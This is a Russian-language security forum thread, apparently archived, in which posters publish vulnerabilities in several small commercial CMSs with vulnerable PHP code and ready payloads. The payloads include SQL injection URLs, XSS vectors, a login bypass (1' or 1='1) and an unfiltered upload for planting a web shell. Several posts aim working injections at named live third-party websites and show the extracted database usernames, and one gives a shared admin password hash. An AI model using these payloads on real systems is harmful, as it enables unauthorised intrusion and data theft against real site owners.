ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

22.07.2012, 16:54
|
|
Guest
Сообщений: n/a
Провел на форуме: 129743
Репутация:
92
|
|
Smart-CMS
Уязвимость: SQL-Injection
http://www.site.com/program/link.php?act=list&id=[SQLi]
Уязвимость: XSS-Active
http://www.site.com/program/register.php
Поля: "User name", "Reporter name".
http://1337day.com/exploits/19051
|
|
|
|

06.10.2012, 18:19
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Множественные уязвимости в Budhae CMS
Нашёл - BigBear
URL разработчика - www.asuhanov.com/ourcms.php
demo - _ttp://demo.budhaecms.ru/budhae/index.php
Active XSS при добавлении/просмотре пользователя
Уязвимый код
/mods/component_user/add_user.php
Код:
Code:
if ($_POST['process']==1)
{
$ADDUSER['login']=$_POST['login'];
$ADDUSER['fullname']=$_POST['fullname'];
$ADDUSER['types']=$_POST['types'];
$ADDUSER['pass']=$_POST['pass'];
$ADDUSER['confirm']=$_POST['confirm'];
if ($_POST['pass']==$_POST['confirm']){
if ($SID->NewUser($ADDUSER)==1){echo ShowMessage('Пользователь добавлен',1);}else{echo ShowMessage('Такой пользователь уже существует',0);}
echo ShowMessage('Пароли не совпадают',0);
}else{
echo ShowMessage('Пароли не совпадают',0);
}
}
/mods/component_user/list_user.php
Код:
Code:
$USERS = $SID->GetListOfUser();
$PRNUSER='';
for ($i=0;$iПользователь: '.$USERS[$i]["budhae_login"].' ('.$USERS[$i]["budhae_fullname"].') - '.$USERS[$i]["budhae_type"].' - Редактировать Удалить
';
}
Вектор атаки - добавляем пользователя в админке http://site/admin/b_users.php
Login = alert(1234)
ФИО = alert(12345)
Active XSS при редактировании карты сайта
Уязвимый код
/classes/budhae_webpage.php
Код:
Code:
function AddNewPages($INFO){
include_once ("sql.php");
$execute2 = new DBConnect;
$execute2->Connect();
$SQL="INSERT INTO `webpages` (`name`,`url`,`type`) VALUES ('".$INFO["name"]."','".$INFO["url"]."','".$INFO["type"]."');";
$dump = $execute2->Query($SQL);
$execute2->Close();
...
function GetAllPages(){
include_once ("sql.php");
$execute = new DBConnect;
$execute->Connect();
$SQL="SELECT * FROM `webpages`";
$dump = $execute->Query($SQL);
$Count=0;
while ($row=mysql_fetch_array($dump)){
$SID[$Count]['id']=$row['id'];
$SID[$Count]['name']=$row['name'];
$SID[$Count]['url']=$row['url'];
$SID[$Count]['type']=$row['type'];
$Count++;
};
$execute->Close();
return $SID;
}
Вектор атаки
Добавляем новую страницу http://site/admin/b_weburl.php?mode=add&step=1
Название = alert(100)
URL = alert(200)
Active XSSпри добавлении фото
Уязвимый код
/classes/budhae_gallery.php
Код:
Code:
function AddGallery($name,$gid,$tn)
{
include_once ("sql.php");
$execute2 = new DBConnect;
$execute2->Connect();
$TableName='bd_'.$gid.'_galleryname';
$SQL="INSERT INTO `".$TableName."` (`gnames`,`description1`) VALUES ('".$name."','".$tn."');";
$dump = $execute2->Query($SQL);
$execute2->Close();
}
...
function GetAllGallery()
{
include_once ("sql.php");
$execute = new DBConnect;
$execute->Connect();
$SQL="SELECT * FROM `gallery_table`";
$dump = $execute->Query($SQL);
$Count=0;
while ($row=mysql_fetch_array($dump)){
$SID[$Count]['id']=$row['id'];
$SID[$Count]['name']=$row['name'];
$SID[$Count]['idgallery']=$row['idgallery'];
$Count++;
};
Вектор атаки
Добавляем новую галлерею http://site/admin/b_gallery.php?gid=&method=add
Название галереи = alert(100)
SQL-Injection при просмотре "Типа Новостей"
Уязвимый код
/classes/budhae_cats.php
Код:
Code:
function GetPageNameById($id,$gid){
$execute = new DBConnect;
$execute->Connect();
$TableName='bd_'.$gid.'_list';
$SQL="SELECT * FROM `".$TableName."` WHERE `id`=".$id." ORDER BY `show` ASC";
$dump = $execute->Query($SQL);
while ($row=mysql_fetch_array($dump)){
$datetotal = $row['name'];
};
$execute->Close();
return $datetotal;
}
Exploit
http://site/admin/b_catsuser.php?gid=MyCats&method=edit&id=2+and+1=1 +group+by+3
http://site/admin/b_catsuser.php?gid=MyCats&method=edit&id=2+and+1=1 +union+select+1,@@version,3
SQL-Injection при просмотре "Фотоальбома"
Уязвимый код
/classes/budhae_cats.php
Код:
Code:
function GetPageNameById($id,$gid){
include_once ("sql.php");
$execute = new DBConnect;
$execute->Connect();
$TableName='bd_'.$gid.'_galleryname';
$SQL = "SELECT * FROM `".$TableName."` WHERE `id` =".$id;
$dump = $execute->Query($SQL);
while ($row=mysql_fetch_array($dump)){
$SName = $row['gnames'];
};
$execute->Close();
return $SName;
}
Exploit
http://site/admin/b_catsuser.php?gid=MyCats&method=edit&id=2+and+1=1 +group+by+7
http://site/admin/b_catsuser.php?gid=MyCats&method=edit&id=2+and+1=1 +union+select+1,@@version,3,4,5,6,7
ByPass Authentication
Уязвимый код
/classes/budhae_user.php
Код:
Code:
function UserLogin($USERID){
$USERID['login']=strtolower($USERID['login']);
include_once ("sql.php");
$execute = new DBConnect;
$execute->Connect();
$SQL="SELECT * FROM users WHERE `login`='".$USERID['login']."' AND `password` ='".$USERID['password']."' LIMIT 1;";
$dump = $execute->Query($SQL);
$row=mysql_fetch_array($dump);
@session_start();
$_SESSION['budhae_login']=$row['login'];
$_SESSION['budhae_password']=$row['password'];
$_SESSION['budhae_type']=$row['type'];
$_SESSION['budhae_fullname']=$row['fullname'];
$_SESSION['budhae_date']=$row['date'];
$_SESSION['budhae_status']='approved';
$_SESSION['unique']=$row['unique'];;
return session_id();
$execute->Close();
}
Exploit
http://site/admin/index.php
login= 1' or 1='1
pass = 1' or 1='1
Раскрытие путей при любом обращении к файлам в /mods
_ttp://site/admin/mods/component_ftp/companent_main.php
_ttp://site/admin/mods/component_detect_cats.php
Код:
Code:
Fatal error: Class 'Files' not found in /var/www/clients/client11/web106/web/demo/budhae/mods/component_ftp/companent_main.php on line 3
Код:
Code:
Fatal error: Class 'Components' not found in /var/www/clients/client11/web106/web/demo/budhae/mods/component_detect_cats.php on line 7
Заливка шелла
_ttp://site/admin/filecomponent.php
Загружаемые расширения не фильтруются ---> shell.php
P.S. Очень дырявый и бажный движок. Перед покупкой 100 раз подумайте !!!
PoC: http://ioanidi.com/admins/
|
|
|

14.12.2012, 18:30
|
|
Guest
Сообщений: n/a
Провел на форуме: 178623
Репутация:
94
|
|
CMS alfasfera.com
Уязвимости к CMS этой веб-студии.
SQL Injection (POST method)
Идем на страницу восстановления пароля:
Код:
Code:
/page/new_pass/
Вставляем в поле E-Mail SQL запрос.
Панель админ-авторизации: /admin
Примеры уязвимых сайтов:
Уязвимые сайты найти можно у них в портфолио, вот два примера.
_ttp://imprus.su - Онлайн игра
_ttp://antipedofil.org - Оккупай-Педофиляй ит.д.
Хэширование пароля
Пароль хэшируется в MD5 с добавлением соли.
Код:
Code:
497911ed40a7e76681c5e93113f9e4a1:tt-
Этот хэш присутствует на всех сайтах, так что это тоже можно считать уязвимостью.
Найдено мною
|
|
|
|

09.01.2013, 06:59
|
|
Guest
Сообщений: n/a
Провел на форуме: 290351
Репутация:
173
|
|
Связка эксплойтовCritXpack
Активная XSS в поле BackURL
Для её работы нужно создать поток с .exe потом указать BackURL пример google.com/alert('a')
Внимание, после указание BackURL у вас исчезнет статистика, браузеров, загрузок, уников, лоадов и прочее. Зато после проверки админом придёт его сессия.
|
|
|
|

10.05.2013, 21:36
|
|
Guest
Сообщений: n/a
Провел на форуме: 11733
Репутация:
0
|
|
Узнать версию Amiro.CMS
Разработчик CMS: Amiro
Номер версии:
[/CODE]
Значение переменной '_cv' - версия CMS. Так для 5.14.6 _cv=5.14.6.6, а для 5.8.4 _cv=5.8.4.0. Кроме того, попробуйте воспользоваться поиском по коду, ибо данная переменная много, где фигурирует.
PS: Выложите на exploit-db по возможности, может пригодится в будущем.
|
|
|
|

03.03.2014, 00:04
|
|
Guest
Сообщений: n/a
Провел на форуме: 178623
Репутация:
94
|
|
SiteLeader CMS
Цена: Стоимость услуг по разработке сайтов: 75 000 — 250 000
Сайт: www.siteleader.ru
Тестировалось на версии 3.62
SQL Injection
Код:
Code:
/news/[VALIDNUMBER][SQLINJ]
Пример реализации
Код:
Code:
http://www.juliavolkova.com/ru/news/1'
Код:
Code:
http://www.juliavolkova.com/ru/news/-1' union all select 1,2,concat(user(),0x3a,database()),4,5-- a
Ответ: VOLKOVA@LOCALHOST:VOLKOVA
Код:
Code:
http://krasimvse.ru/news/1'
Код:
Code:
http://krasimvse.ru/news/-1' union all select 1,2,concat(user(),0x3a,database()),4,5-- a
Ответ: kraskoteka@localhost:kraskoteka
Админ-панель: /admin/login/
Стандартный логин: root
При добавлении контента (в админ-панели) везде выполняется JS код.
Найдено мной
|
|
|
|

03.04.2014, 11:57
|
|
Guest
Сообщений: n/a
Провел на форуме: 132418
Репутация:
652
|
|
CMS A4-site
Сайт: www.a4-site.ru
Демо-версия: www.demo.a4-site.ru
Функциональность: От сайтов-визиток с минимальной функциональностью до проектов с посещаемостью в десятки и сотни тысяч посетителей в день. (c)
Стоимость: Система управления сайтом A4-Site пока не продается "в коробке". Но вы можете заказать реализацию вашего проекта на ее основе в Интернет-компании A4-Site.(c)
Исследования проводим на демо-версии.
SQL Injection
Уязвимый параметр: search_str
Вектор: error-based
Требования: mq = off
Exploit: [http://demo.a4-site.ru/index.php?checksumm=193232&rubr=pages&page=search& search_str='and(extractvalue(1,concat(0x3a,version())))and'&search_cond=AND]
Query:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]INSERT INTO distr_searchlog[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]sl_query[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]sl_count[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]sl_time[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]sl_cond[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]VALUES[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]and([/COLOR][COLOR="#0000BB"]extractvalue[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x3a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]version[/COLOR][COLOR="#007700"]())))and[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'0'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'AND'[/COLOR][COLOR="#007700"])[/COLOR][/COLOR]
XSS (passive)
Все тот же параметр search_str
Exploit: [http://demo.a4-site.ru/index.php?checksumm=193232&rubr=pages&page=search& search_str=">&search_cond=AND]
|
|
|
|

23.07.2014, 11:59
|
|
Guest
Сообщений: n/a
Провел на форуме: 132418
Репутация:
652
|
|
CMS Business Station
Сайт: http://cms-bs.ru
Стоимость: http://cms-bs.ru/configuration/
reflected XSS
Уязвимость присутствует в форме авторизации - переменная login.
PoC: отправляем пакет
Сообщение от None
POST /configuration/ HTTP/1.1
Host: cms-bs.ru
...
login=
">alert(1)
&password=111&submit=%C2%F5%EE%E4
|
|
|
|

09.03.2015, 12:43
|
|
Guest
Сообщений: n/a
Провел на форуме: 178623
Репутация:
94
|
|
CMS Shop-Rent
Сайт: shop-rent.ru
Time-Based Blind SQL Injection (pics.php):
Код:
Code:
pics.php?id=1'+and+(select * from+(select(sleep(10)))x)+and--'1
XSS
Код:
Code:
pics.php?id=">alert();
Примеры:
Код:
Code:
http://disloc.ru/pics.php?id=1' and (select * from (select(sleep(10)))x) and--'1
TRUE
Код:
Code:
http://bookcoffee.ru/pics.php?id=215' and (select * from (select(sleep(10)))x) and--'1
TRUE
Таблица с администраторами: gd_main_users
Таблица с остальными пользователями: gd_users
Админ-панель: admin.site.ru
|
|
|
|

22.05.2017, 12:27
|
|
Guest
Сообщений: n/a
Провел на форуме: 60408
Репутация:
0
|
|
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|